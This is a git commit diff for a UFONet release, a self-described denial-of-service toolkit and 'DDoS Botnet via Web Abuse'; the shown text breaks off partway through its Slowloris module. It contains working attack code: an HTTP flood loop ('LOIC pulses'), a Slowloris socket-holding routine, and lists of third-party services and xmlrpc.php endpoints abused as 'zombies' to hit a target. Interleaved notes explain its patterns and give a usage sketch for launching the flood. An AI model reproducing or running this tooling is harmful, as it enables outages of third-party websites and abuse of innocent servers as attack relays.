
release v1.2 - Armageddon

psy 5 years ago
parent
commit
aafcd2a878

+ 0 - 98
README.md

@@ -1,98 +0,0 @@
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-welcome_small.png "UFONet Welcome")
-
-----------
-
- + Web:  https://ufonet.03c8.net
-
-----------
-
- + FAQ:  https://ufonet.03c8.net/FAQ.html
-
-----------
-
-  UFONet - is a toolkit designed to launch DDoS and DoS attacks.
-
-  See these links for more info:
-
-   - CWE-601:Open Redirect: 
-     https://cwe.mitre.org/data/definitions/601.html
-
-   - OWASP:URL Redirector Abuse: 
-     https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-schema.png "UFONet Schema")
-
-----------
-
-#### Installing:
-
-  UFONet runs on many platforms.  It requires Python (>2.7.9) and the following libraries:
-
-       python-pycurl - Python bindings to libcurl
-       python-geoip  - Python bindings for the GeoIP IP-to-country resolver library
-       python-whois  - Python module for retrieving WHOIS information - Python 2
-       python-crypto - Cryptographic algorithms and protocols for Python
-       python-requests - elegant and simple HTTP library for Python2, built for human beings
-       python-scapy - Packet generator/sniffer and network scanner/discovery
-
-  You can automatically get all required libraries using:
-
-       python setup.py install
-
-  For manual installation, on Debian-based systems (ex: Ubuntu), run: 
-
-       sudo apt-get install python-pycurl python-geoip python-whois python-crypto python-requests python-scapy
-
-  On other systems such as: Kali, Ubuntu, ArchLinux, ParrotSec, Fedora, etc... also run:
-
-       pip install geoip 
-       pip install requests
-       pip install pycrypto
-
-####  Source libs:
-
-   * Python: https://www.python.org/downloads/
-   * PyCurl: http://pycurl.sourceforge.net/
-   * PyGeoIP: https://pypi.python.org/pypi/GeoIP/
-   * PyWhois: https://pypi.python.org/pypi/whois
-   * PyCrypto: https://pypi.python.org/pypi/pycrypto
-   * PyRequests: https://pypi.python.org/pypi/requests
-   * PyScapy: https://pypi.org/project/scapy/
-   * Leaflet: http://leafletjs.com/ (provided)
-
-----------
-
-####  License:
-
-  UFONet is released under the GPLv3. You can find the full license text
-in the [LICENSE](./docs/LICENSE) file.
-
-----------
-
-####  Screenshots (current version!):
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-shell1_small.png "UFONet Shell")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-shell2_small.png "UFONet GUI Shell")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-welcome_small.png "UFONet GUI Welcome")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-main_small.png "UFONet GUI Main Panel")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-botnet_small.png "UFONet GUI Botnet")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-stats_small.png "UFONet GUI General Stats")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-board_small.png "UFONet GUI Board/Forum")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-grid_small.png "UFONet GUI Grid")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-grid2_small.png "UFONet GUI Grid Stats")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-wargames_small.png "UFONet GUI Wargames")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-attack_small.png "UFONet GUI Attack")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-gui3_small.png "UFONet GeoMap /deploying/")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-gui4_small.png "UFONet GeoMap /attacking/")

+ 1 - 1
botnet/aliens.txt

@@ -1 +1 @@
-https://api.loadimpact.com/v3/anonymous-test-runs;$POST;url
+https://gtmetrix.com/analyze.html;$POST;url

+ 1 - 1
botnet/rpcs.txt

@@ -1 +1 @@
-http://heightsmedia.com/xmlrpc.php
+https://heightsmedia.com/xmlrpc.php

+ 1 - 0
botnet/ucavs.txt

@@ -1 +1,2 @@
 https://downforeveryoneorjustme.com/
+https://website-down.com/

+ 2 - 2
core/__init__.py

@@ -1,7 +1,7 @@
-#!/usr/bin/env python 
+#!/usr/bin/env python
 # -*- coding: utf-8 -*-"
 """
-UFONet - DDoS Botnet via Web Abuse - 2013/2014/2015/2016 - by psy (epsylon@riseup.net)
+UFONet - Denial of Service Toolkit - 2013/2018 - by psy (epsylon@riseup.net)
 
 You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51

+ 80 - 69
core/ajaxmap.py

@@ -7,35 +7,39 @@ You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
-import socket, threading, re, base64, os, time
-import webbrowser, subprocess, urllib2, json, sys
+import socket, threading, re, base64, os, time, traceback
+import webbrowser, subprocess, urllib2, json, sys, shlex
 from urlparse import urlparse
 from main import UFONet
-import base64, traceback
 
 try:
     import pygeoip
 except:
-    print "\nError importing: pygeoip lib. \n\n On Debian based systems:\n\n $ 'sudo apt-get install python-geoip' or 'pip install geoip')\n"
+    print "\n[Error] [AI] Cannot import lib: pygeoip. \n\n To install it try:\n\n $ 'sudo apt-get install python-geoip' or 'pip install geoip'\n"
     sys.exit(2)
 
 class AjaxMap(object):
     def __init__(self):
+        self.geo_db_mirror1 = 'http://176.28.23.46/bordercheck/maps.tar.gz'  # Turina Server
+        self.geo_db_mirror2 = 'http://83.163.232.95/bordercheck/maps.tar.gz' # Mirror
         self._geoip=None
         self._geoasn=None
         self._geoipstatus='nomap'
         self._err=''
         ufonet = UFONet()
         ufonet.create_options()
-        self.zombies = ufonet.extract_zombies()
-        aliens_army = ufonet.extract_aliens()
-        droids_army = ufonet.extract_droids()
-        ucavs_army = ufonet.extract_ucavs()
-        rpcs_army = ufonet.extract_rpcs()
-        self.zombies.extend(aliens_army)
-        self.zombies.extend(droids_army)
-        self.zombies.extend(ucavs_army)
-        self.zombies.extend(rpcs_army)
+        try:
+            self.zombies = ufonet.extract_zombies()
+            aliens_army = ufonet.extract_aliens()
+            droids_army = ufonet.extract_droids()
+            ucavs_army = ufonet.extract_ucavs()
+            rpcs_army = ufonet.extract_rpcs()
+            self.zombies.extend(aliens_army)
+            self.zombies.extend(droids_army)
+            self.zombies.extend(ucavs_army)
+            self.zombies.extend(rpcs_army)
+        except:
+            return
 
     def get_err(self):
         return self._err
@@ -48,8 +52,7 @@ class AjaxMap(object):
                 f=open("maps.downloadmsg","wb")
                 f.write("")
                 f.close()
-                print "[Info] GUI: GeoIP data download started..."
-                print "[Info] GUI: If this message persists: remove 'maps.downloading' and 'maps' folder, then restart ufonet...\n"
+                print "[Info] [AI] [Control] GeoIP data download started! -> [OK!]\n"
             self._geoipstatus='downloading'
         elif os.path.isdir('maps'):
             if self._geoip == None :
@@ -75,7 +78,6 @@ class AjaxMap(object):
 	    traceback.print_exc()
 
     def download_maps(self):
-        import subprocess, shlex
         # generate geolocation values on a map
         if self.get_status() != 'nomap':
             return self._geoipstatus == 'ok'
@@ -85,23 +87,20 @@ class AjaxMap(object):
         f.write("download started<script>$'('#ufomsg').load('/js/ajax.js?fetchmap=')")
         f.close()
         self._geoipstatus="downloading"
-        # download maps folder
-        geo_db_mirror1 = 'http://176.28.23.46/bordercheck/maps.tar.gz'  # Turina Server
-        geo_db_mirror2 = 'http://83.163.232.95/bordercheck/maps.tar.gz' # Mirror
         try: # mirror 1
-            print "\n[Info] - Fetching maps from 'Mirror 1':", geo_db_mirror1 + "\n"
-            response = self.retrieve(geo_db_mirror1, 'maps.tar.gz')
+            print "\n[Info] [AI] Fetching maps from 'Mirror 1':", self.geo_db_mirror1 + "\n"
+            response = self.retrieve(self.geo_db_mirror1, 'maps.tar.gz')
         except:
             try: # mirror 2
-                print "[Error] - Mirror 1':", geo_db_mirror1 + " Failed!\n"
-                print "[Info] - Fetching maps from 'Mirror 2':", geo_db_mirror2 + "\n"
-                response = self.retrieve(geo_db_mirror2, 'maps.tar.gz')
+                print "[Error] [AI] Mirror 1':", self.geo_db_mirror1 + " Failed! -> [Discarding!]\n"
+                print "[Info] [AI] Fetching maps from 'Mirror 2':", self.geo_db_mirror2 + "\n"
+                response = self.retrieve(self.geo_db_mirror2, 'maps.tar.gz')
             except:
-                print("[Error] - Something wrong fetching maps from mirrors ...Aborting!"), "\n"
+                print("[Error] [AI] Something wrong fetching maps from mirrors! -> [Aborting!]"), "\n"
 		traceback.print_exc()
                 return False #sys.exit(2)
         subprocess.call(shlex.split('tar zxfv maps.tar.gz'))
-        print "\n[Info] GeoIP maps and databases: ready!\n"
+        print "\n[Info] [AI] [Control] GeoIP maps and databases -> [OK!]\n"
         # set pygeoip data sources
         self._geoip = pygeoip.GeoIP('maps/GeoLiteCity.dat')
         self._geoasn = pygeoip.GeoIP('maps/GeoIPASNum.dat')
@@ -115,17 +114,17 @@ class AjaxMap(object):
         # check for status, downloading is done by ajax() method
         if self.get_status() != 'ok':
             if self._geoipstatus =='downloading':
-                print "\n[Info] GeoIP maps and databases: downloading\n"
-	        self._err= "ufomsg('Downloading maps...')"
+                print "\n[Info] [AI] [Control] GeoIP maps and databases -> [Downloading!]\n"
+	        self._err= "ufomsg('[Info] [AI] Downloading maps... -> [Waiting!]')"
             elif not os.path.exists('maps/GeoIPASNum.dat') or not os.path.exists('maps/GeoLiteCity.dat'):
-                print "\n[Info] GeoIP maps and databases: download starting!\n"
-                self._err= "ufomsg('[Info] Map download starting')\n$('#ufomsg').load('/js/ajax.js?fetchgeoip=')"
+                print "\n[Info] [AI] GeoIP maps and databases -> [Starting!]\n"
+                self._err= "ufomsg('[Info] [AI] Map download starting')\n$('#ufomsg').load('/js/ajax.js?fetchgeoip=')"
             else:
-                print "\n[Info] GeoIP maps and databases: unknown error\n"
-                self._err= "ufomsg('<font color='red'>[Info]</font> Maps: unknown error...')"
+                print "\n[Error] [AI] GeoIP maps and databases: FAILED! -> [Discarding!]\n"
+                self._err= "ufomsg('<font color='red'>[Info] [AI]</font> Maps: unknown error -> [Discarding!]')"
             return None
         if re.match(r'^127\.\d{1,3}\.\d{1,3}\.\d{1,3}$', zombie) or re.match(r'^10\.\d{1,3}\.\d{1,3}\.\d{1,3}$', zombie) or re.match(r'^192.168\.\d{1,3}\.\d{1,3}$', zombie) or re.match(r'^172.(1[6-9]|2[0-9]|3[0-1]).[0-9]{1,3}.[0-9]{1,3}$', zombie) or re.match('localhost', zombie):
-            self._err= "ufomsg('<font color='red'>[Info]</font> Maps: invalid ip data...')"
+            self._err= "ufomsg('<font color='red'>[Info] [AI] [Control]</font> Maps: invalid ip data -> [Discarding!]')"
             return None
         # create geoip data skeleton
         geo_zombie={}
@@ -144,39 +143,50 @@ class AjaxMap(object):
         try:
             ip = socket.gethostbyname(url.netloc)
         except:
-            self._err= "ufomsg('<font color='yellow'>[Info]</font> GeoIP: hostbyname failed for "+str(url.netloc)+"...')"
-            return None
-        if re.match(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$",ip):
-            geo_zombie['ip'] = ip
             try:
-                record = self._geoip.record_by_addr(ip)
+                import dns.resolver
+                r = dns.resolver.Resolver()
+                r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                a = r.query(url.netloc, "A") # A record
+                for rd in a:
+                    ip = str(rd)
             except:
-                self._err= "ufomsg('<font color='yellow'>[Info]</font> GeoIP: lookup failed for "+ip+", page reload required...')"
+                self._err= "ufomsg('<font color='yellow'>[Error] [AI]</font> GeoIP: hostbyname failed for "+str(url.netloc)+"...')"
                 return None
-            try:
-                asn = self._geoasn.org_by_addr(ip)
-                if asn is not None:
-                    geo_zombie['asn'] = asn.encode('utf-8')
-            except:
-                geo_zombie['asn'] = 'No ASN provided'
-            try:
-                geo_zombie['host_name'] = socket.gethostbyaddr(ip)[0].encode('utf-8')
-            except:
-                geo_zombie['host_name'] = 'No hostname'
-            try:
-                longitude = str(float(record['longitude']))
-                geo_zombie['longitude'] = longitude
-                latitude = str(float(record['latitude']))
-                geo_zombie['latitude'] = latitude
-            except:
-                pass
-            try:
-                geo_zombie['country'] = record["country_name"].encode('utf-8')
-                geo_zombie['country_code'] = record["country_code"].lower().encode('utf-8')
-                if record['city'] is not None:
-                    geo_zombie['city'] = record["city"].encode('utf-8')
-            except:
-                pass
+        if ip:
+            if re.match(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$",ip):
+                geo_zombie['ip'] = ip
+                try:
+                    record = self._geoip.record_by_addr(ip)
+                except:
+                    self._err= "ufomsg('<font color='yellow'>[Error] [AI] </font> GeoIP: lookup failed for "+ip+", page reload required...')"
+                    return None
+                try:
+                    asn = self._geoasn.org_by_addr(ip)
+                    if asn is not None:
+                        geo_zombie['asn'] = asn.encode('utf-8')
+                except:
+                    geo_zombie['asn'] = 'No ASN provided'
+                try:
+                    geo_zombie['host_name'] = socket.gethostbyaddr(ip)[0].encode('utf-8')
+                except:
+                    geo_zombie['host_name'] = 'No hostname'
+                try:
+                    longitude = str(float(record['longitude']))
+                    geo_zombie['longitude'] = longitude
+                    latitude = str(float(record['latitude']))
+                    geo_zombie['latitude'] = latitude
+                except:
+                    pass
+                try:
+                    geo_zombie['country'] = record["country_name"].encode('utf-8')
+                    geo_zombie['country_code'] = record["country_code"].lower().encode('utf-8')
+                    if record['city'] is not None:
+                        geo_zombie['city'] = record["city"].encode('utf-8')
+                except:
+                    pass
+        else:
+            geo_zombie = None
         return geo_zombie
 
     # generates javascript for adding a new zombie with geoip data
@@ -186,7 +196,8 @@ class AjaxMap(object):
         if gz is not None and gz['latitude']!= '-':
             ret = "Zombies.add('"+z+"',Array(new L.LatLng("+str(gz['latitude'])+","+str(gz['longitude'])+"),'"+gz['city']+"','"+gz['country']+"','"+gz['country_code']+"','"+gz['asn']+"','"+gz['ip']+"','"+gz['host_name']+"'))\n"
         else:
-            #print 'geozombie dead : ',z
+            url = urlparse(z)
+            print '[Error] [AI] [Control] [GUI]',url.netloc, "isn't geolocated on [Map] -> [Discarding!]"
             ret += "dead_zombies.push('"+z+"')\n"
         ret += "last_zombie = '"+z+"'\n"
         return ret
@@ -208,14 +219,14 @@ class AjaxMap(object):
         if 'fetchgeoip' in pGet.keys():
             if self.get_status() == "nomap":
                 self.download_maps()
-                return "[Info] Geoip data download done!<br/>"
+                return "[Info] [AI] [Control] Geoip data download! -> [OK!]<br/>"
         if 'stats' in pGet.keys():
             stat='<script>$(".ufo_stat_div").show()</script>'
             if os.path.exists('/tmp/ufonet.html'):
                 for x in open(r'/tmp/ufonet.html').readlines():
                     stat = stat + x
             else:
-                stat="<i>[Info] Waiting for statistics generation...</i>"
+                stat="<i>[Info] [AI] [Control] Generating statistics... -> [Waiting!]</i>"
             return stat+"</div>"
         if self.get_status() != "ok":
             dljs=""
@@ -224,7 +235,7 @@ class AjaxMap(object):
             if 'doll' in pGet.keys():
                 dljs+="$('#ufomsg').load('/js/ajax.js?fetchdoll="+pGet['doll']+"')\n"
                 dljs+="doll=new Doll('"+pGet["doll"]+"')\n"
-            return "[Info] GeoIP data download in progress...<br><i>see console for errors</i>+<script>"+dljs+"</script>"
+            return "[Info] [AI] GeoIP data download in progress...<br><i>See console for errors</i>+<script>"+dljs+"</script>"
         if 'zombie' in pGet.keys():
             zn=base64.b64decode(pGet['zombie'])
             nzn=self.get_next_zombie(zn)
@@ -232,10 +243,10 @@ class AjaxMap(object):
                 zombie=self.get_js(nzn)
                 return """ <script>
                 """+zombie+"""
-                ufomsg('[Info] Adding zombie: """+nzn+"""...')
+                ufomsg('[Info] [AI] [Control] Adding zombie: """+nzn+"""...')
                 </script>"""
             else:
-                return "<script>zdone=true\nufomsg('[Info] All zombies deployed!...')\n </script>\n"
+                return "<script>zdone=true\nufomsg('[Info] [AI] [Control] All zombies deployed! -> [OK!]')\n </script>\n"
         if 'fetchdoll' in pGet.keys():
             tn=pGet['fetchdoll']
             target = self.geo_ip(tn)
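
  Note: the hunks above introduce a pattern that recurs throughout this release: resolve a host with socket.gethostbyname() and, if that fails, fall back to dnspython against Google's public resolvers. The same block reappears below in loris.py, abductor.py and the new core/mods/ files. A minimal standalone sketch of that fallback, assuming the python-dns (dnspython) package is installed; the resolve_host() helper name is illustrative, not part of the commit:

    import socket
    from urlparse import urlparse

    def resolve_host(host_or_url):
        # accept either a bare hostname or a full URL
        host = urlparse(host_or_url).netloc or host_or_url
        try:
            return socket.gethostbyname(host)           # system resolver first
        except socket.error:
            try:
                import dns.resolver                      # dnspython fallback
                r = dns.resolver.Resolver()
                r.nameservers = ['8.8.8.8', '8.8.4.4']   # google DNS resolvers
                for rd in r.query(host, "A"):            # first A record wins
                    return str(rd)
            except Exception:
                return None                              # caller decides how to degrade
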

+ 32 - 27
core/herd.py

@@ -7,11 +7,11 @@ You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
-import socket, threading, logging, datetime
-import zombie
-import sys, os, re
+import socket, threading, logging, datetime, sys, os, re, time
 from urlparse import urlparse
 
+import zombie
+
 # zombie tracking class
 class Herd(object):
     # basic constructor
@@ -47,7 +47,7 @@ class Herd(object):
         except:
             pass
 
-    # got a new one !
+    # got a new one!
     def new_zombie(self, zombie):
         self.total_connections+=1
         if zombie not in self.stats:
@@ -85,11 +85,9 @@ class Herd(object):
         options = self.ufonet.options
         if options.verbose == True:
             if ac>self.living:
-                print "[Control] Active zombies:", ac-self.living, ", waiting for them to return..."
-            else:
-                print "="*41
-                print "\n[Control] All zombies returned to the master ;-)"
-                print "-"*21
+                if ac-self.living not in self.ufonet.ac_control:
+                    print "[Info] [AI] [Control] Active [ARMY] returning from the combat front: "+ str(ac-self.living)
+                    self.ufonet.ac_control.append(ac-self.living)
         with self.lock:
             return ac==self.living
 
@@ -114,8 +112,11 @@ class Herd(object):
         buf=""
         out=self.get_stat()
         if os.path.exists("/tmp/ufonet.html.tmp"):
-            print 'tmp file found, html output abort !!!'
-            return
+            try:
+                self.cleanup()
+            except:
+                print '[Info] Previous tmp file found... html content will not be updated.'
+                pass
         buf += "<div>" + os.linesep
         if out['err'] is not None:
             buf += "<div>Errors : <br/>"+str(out['err'])+'</div>'+os.linesep
@@ -144,23 +145,26 @@ class Herd(object):
         buf += "<div><h3>Troops: </h3></div>"+os.linesep
         buf += "<div>Aliens: " + str(self.ufonet.total_aliens) + " | Hits: " + str(self.ufonet.aliens_hit) + " | Fails: " + str(self.ufonet.aliens_fail)+"</div>" + os.linesep
         buf += "<div>Droids: " + str(self.ufonet.total_droids) + " | Hits: " + str(self.ufonet.droids_hit) + " | Fails: " + str(self.ufonet.droids_fail)+"</div>" + os.linesep
+        buf += "<div>X-RPCs: " + str(self.ufonet.total_rpcs) + " | Hits: " + str(self.ufonet.rpcs_hit) + " | Fails: " + str(self.ufonet.rpcs_fail)+"</div>" + os.linesep
         buf += "<div>UCAVs: " + str(self.ufonet.total_ucavs) + " | Hits: " + str(self.ufonet.ucavs_hit) + " | Fails: " + str(self.ufonet.ucavs_fail)+"</div>" + os.linesep
-        buf += "<div>XRPCs: " + str(self.ufonet.total_rpcs) + " | Hits: " + str(self.ufonet.rpcs_hit) + " | Fails: " + str(self.ufonet.rpcs_fail)+"</div>" + os.linesep
         f = open("/tmp/ufonet.html.tmp", "w") 
         f.write(buf)
         if(final):
             f.write("<script>hdone=true</script>")
         f.close()
-        os.rename("/tmp/ufonet.html.tmp","/tmp/ufonet.html")
+        try:
+            os.rename("/tmp/ufonet.html.tmp","/tmp/ufonet.html")
+        except:
+            pass
 
     # generate statistics for stdout
     def format(self, out):
+        if len(out['data'])==0:
+            print "[Info] Not any feedback data to show. Exiting..."
+            return
         print '='*42
         print "Herd statistics"
         print "="*42
-        if len(out['data'])==0:
-            print "\n[Error] Something wrong retrieving data feedback. Executing evasion routine!"
-            return
         for zo in out['data']:
             z=out['data'][zo]
             print 'Zombie :', z['name'], " | ", z['hits'], " hits ", z['fails'] ," fails ", z['retries'], " retries "
@@ -174,7 +178,7 @@ class Herd(object):
             print "="*80
             print "Worst zombie: ", out['max_failz'], " with ", out['max_fails'], " fails"
         print "="*80
-        print "Total invocations:", self.total_connections,"| Zombies:", len(self.stats),"| Hits:", self.total_hits,"| Fails:", self.total_fails
+        print "Total invocations:", self.total_connections,"| Zombies:", str(self.ufonet.total_zombie),"| Hits:", self.total_hits,"| Fails:", self.total_fails
         print "Total time:", out['total_time'], "| Avg time:", out['avg_time']
         print "Total size:", out['total_size'],"| Avg size:", out['avg_size']
         print "-"*21
@@ -183,8 +187,8 @@ class Herd(object):
         print "="*42
         print "Aliens: " + str(self.ufonet.total_aliens) + " | Hits: " + str(self.ufonet.aliens_hit) + " | Fails: " + str(self.ufonet.aliens_fail)
         print "Droids: " + str(self.ufonet.total_droids) + " | Hits: " + str(self.ufonet.droids_hit) + " | Fails: " + str(self.ufonet.droids_fail)
+        print "X-RPCs: " + str(self.ufonet.total_rpcs) + " | Hits: " + str(self.ufonet.rpcs_hit) + " | Fails: " + str(self.ufonet.rpcs_fail)
         print "UCAVs : " + str(self.ufonet.total_ucavs) + " | Hits: " + str(self.ufonet.ucavs_hit) + " | Fails: " + str(self.ufonet.ucavs_fail)
-        print "XRPCs : " + str(self.ufonet.total_rpcs) + " | Hits: " + str(self.ufonet.rpcs_hit) + " | Fails: " + str(self.ufonet.rpcs_fail)
         print "-"*21
         print "\n" # gui related
         print '='*21
@@ -194,13 +198,13 @@ class Herd(object):
         data={}
         out={'err':None,"header":"","data":{},"total":{},"footer":"",'max_fails':0,'max_failz':"",'max_hits':0,'max_hitz':""}
         if os.path.exists("html.tmp"):
-            out['err']= "tmp file found"
+            out['err']= "\n[Info] Previous tmp file found... html content will not be updated."
             return out
         if self.total_connections==0:
-            out['err']= "No herd without zombies"
+            out['err']= "\n[Error] No herd without zombies..."
             return out
         if len(self.stats)==0:
-            out['err']=  "No statistics available"
+            out['err']=  "\n[Error] No statistics available..."
             return out
         self.zero_fails = 0
         for zombie_stat in self.stats:
@@ -208,7 +212,7 @@ class Herd(object):
             try:
                 entry={'name':zombie_stat,"hits":0,"fails":0,"retries":0,"time":0,"max_time":0,"min_time":zs[0][1],"avg_time":0,"size":0,"max_size":0,"min_size":zs[0][2],"avg_size":0}
             except:
-                out['err']=  "No statistics available\n"
+                out['err']=  "\n[Error] No statistics available...\n"
                 return out
             if len(zs)==0:
                 continue
@@ -217,8 +221,11 @@ class Herd(object):
                     entry['hits']+=1
                 else:
                     entry['fails']+=1
-                if self.connection[zombie_stat]:
-                    entry['retries']+=1
+                try:
+                    if self.connection[zombie_stat]:
+                        entry['retries']+=1
+                except:
+                    entry['retries']=entry['retries'] # black magic!
                 entry['time']+=line[1]
                 if line[1]>entry['max_time']: 
                     entry['max_time']=line[1]
@@ -260,8 +267,6 @@ class Herd(object):
     # wrapper
     def dump(self):
         out=self.get_stat()
-        if out['err'] is not None:
-            print "[Error] "+out['err']
         self.format(out)
 
     def list_fails(self):
@@ -272,7 +277,7 @@ class Herd(object):
             return
         if not options.forceyes:
             print '-'*25
-            update_reply = raw_input("Want to update your army (Y/n)")
+            update_reply = raw_input("Do you want to update your army (Y/n)")
             print '-'*25
         else:
             update_reply = "Y"

File diff suppressed because it is too large
+ 1 - 1
core/js/jquery-1.10.2.min.js


+ 3 - 3
core/js/ufo.js

@@ -1,5 +1,5 @@
 /*
-UFONet - DDoS Botnet via Web Abuse - 2013/2014/2015/2016 - by psy (epsylon@riseup.net)
+UFONet - Denial of Service Toolkit - 2013/2018 - by psy (epsylon@riseup.net)
 
 You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
@@ -352,7 +352,7 @@ function ufowatch(){
 		    label=total_zombies -dead_zombies.length
 		    $('.ufo_error_div').html('<div id="ufo_error_div">To be discarded : <br/><ul>'
 					     +dead_zombies.join("<li> -")+'</ul></div>')
-		    error = "<a href='#' onclick='show_error()'> + "+dead_zombies.length+" to be discarded...</a>"
+		    error = "<a href='#' onclick='show_error()'> + "+dead_zombies.length+" not listed...</a>"
 		}
 	    }
 	$(".ufo_title_div").html('<div id="status"><center><h2><font color="red">Zombies:</font></h2><h3><font color="green" size="9px"><b>'+label+'</b></font></h3>'+error+'</center></div>');
@@ -390,7 +390,7 @@ function initMap (targetdoll=false) {
     new L.Control.Zoom({position: 'topright'}).addTo(map)
     map.scrollWheelZoom.disable()
     map.addControl(new UfoControlClass())
-    $('.ufo_msg_div').html("<h2 style='text-align:right'>Map Console <a href=\"#\" id='showMsg'>[+]</a> <a href=\"#\" id='hideMsg'>[-]</a></h2><div id='ufomsg'>[Info] Locating zombies. Please wait...<br/><br/></div><div id='ufomsg_last'>[Info] Locating zombies. Please wait...<br/></div>")
+    $('.ufo_msg_div').html("<h2 style='text-align:right'>Map Console <a href=\"#\" id='showMsg'>[+]</a> <a href=\"#\" id='hideMsg'>[-]</a></h2><div id='ufomsg'>[Info] [AI] [Control] Locating zombies... -> [Waiting!]<br/><br/></div><div id='ufomsg_last'>[Info] [AI] [Control] Locating zombies.... -> [Waiting!]<br/></div>")
     map.addControl(new UfoTitleClass())
     $(".ufo_title_div").html('<div id="status"><h2><font color="red">Zombies:</font></h2><center><h3><font color="green" size="9px"><b>'+total_zombies+'</b></font></h3></center></div>');
     map.addControl(new UfoErrorClass())

File diff suppressed because it is too large
+ 1538 - 780
core/main.py


+ 9 - 0
core/mods/__init__.py

@@ -0,0 +1,9 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+"""
+UFONet - Denial of Service Toolkit - 2013/2018 - by psy (epsylon@riseup.net)
+
+You should have received a copy of the GNU General Public License along
+with UFONet; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""

+ 13 - 7
core/loic.py

@@ -7,9 +7,15 @@ You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
-import requests, random
-from requests.packages.urllib3.exceptions import InsecureRequestWarning # black magic
-requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+import sys, random
+
+try:
+    import requests
+    from requests.packages.urllib3.exceptions import InsecureRequestWarning # black magic
+    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+except:
+    print "\nError importing: requests lib. \n\n To install it on Debian based systems:\n\n $ 'sudo apt-get install python-requests' or 'pip install requests'\n"
+    sys.exit(2)
 
 # UFONet DoS Web LOIC (Low Orbit Ion Cannon)
 def ionize(self, target, rounds, proxy):
@@ -24,11 +30,11 @@ def ionize(self, target, rounds, proxy):
             headers = {'User-Agent': str(self.user_agent)}
             try:
                 r = requests.get(target, headers=headers, proxies=proxyD, verify=False)
-                print "[Info] LOIC: Firing 'pulse' ["+str(n)+"] -> Status: HIT!"
+                print "[Info] [AI] [LOIC] Firing 'pulse' ["+str(n)+"] -> [HIT!]"
             except:
-                print "[Error] LOIC: Failed to engage with 'pulse' ["+str(n)+"]"
+                print "[Error] [AI] LOIC: Failed to engage with 'pulse' ["+str(n)+"]"
     except:
-        print("[Error] LOIC: Failing to engage. Is still target online?...")
+        print("[Error] [AI] [LOIC] Failing to engage... -> Is still target online? -> [Checking!]")
 
 class LOIC(object):
     def __init__(self):
@@ -41,5 +47,5 @@ class LOIC(object):
             self.agents.append(agent)
 
     def attacking(self, target, rounds, proxy):
-        print "\n[Info] Low Orbit Ion Cannon (LOIC) is ready to fire: [" , rounds, "pulses ]"
+        print "\n[Info] [AI] Low Orbit Ion Cannon (LOIC) is ready to fire: [" , rounds, "pulses ]"
         ionize(self, target, rounds, proxy) # attack with LOIC using threading
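
  For orientation, the attacking() signature above takes a target URL, a number of 'pulses' and a proxy. A hedged usage sketch (the module path and the None proxy value are assumptions; the real call sites live in core/main.py, whose diff is suppressed above):

    # hedged usage sketch, assuming execution from the UFONet root directory
    from core.loic import LOIC

    cannon = LOIC()                                      # __init__ populates self.agents
    cannon.attacking("http://target.example", 10, None)  # 10 'pulses'; proxy handling is assumed optional
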

+ 46 - 22
core/loris.py

@@ -7,7 +7,7 @@ You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
-import socket, random, ssl, re
+import socket, random, ssl, re
+from urlparse import urlparse
 
 # UFONet Slow HTTP requests (LORIS)
 def setupSocket(self, ip):
@@ -37,32 +37,47 @@ def setupSocket(self, ip):
         if "Location:" in l:
             try:
                 ip = re.findall('https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', l)[0] # extract new redirect url
-                ip = socket.gethostbyname(ip)
+                try:
+                    ip = socket.gethostbyname(ip)
+                except:
+                   try:
+                       import dns.resolver
+                       r = dns.resolver.Resolver()
+                       r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                       url = urlparse(ip)
+                       a = r.query(url.netloc, "A") # A record
+                       for rd in a:
+                           ip = str(rd)
+                   except:
+                       pass # keep the address already extracted from the 'Location' header
             except:
                 pass
     return sock, ip
 
 def tractor(self, ip, requests): 
     n=0
-    for i in range(requests): 
-        n=n+1
-        try:
-            sock, ip = setupSocket(self, ip)
-            print "[Info] LORIS: Firing 'tractor beam' ["+str(n)+"] -> Status: CONNECTED! (Keeping socket open in time...)"
-        except:
-            print "[Error] LORIS: Failed to engage with 'tractor beam' ["+str(n)+"]"
-        self.sockets.append(sock)
-    while True: # try to abuse HTTP Headers
-        for sock in list(self.sockets):
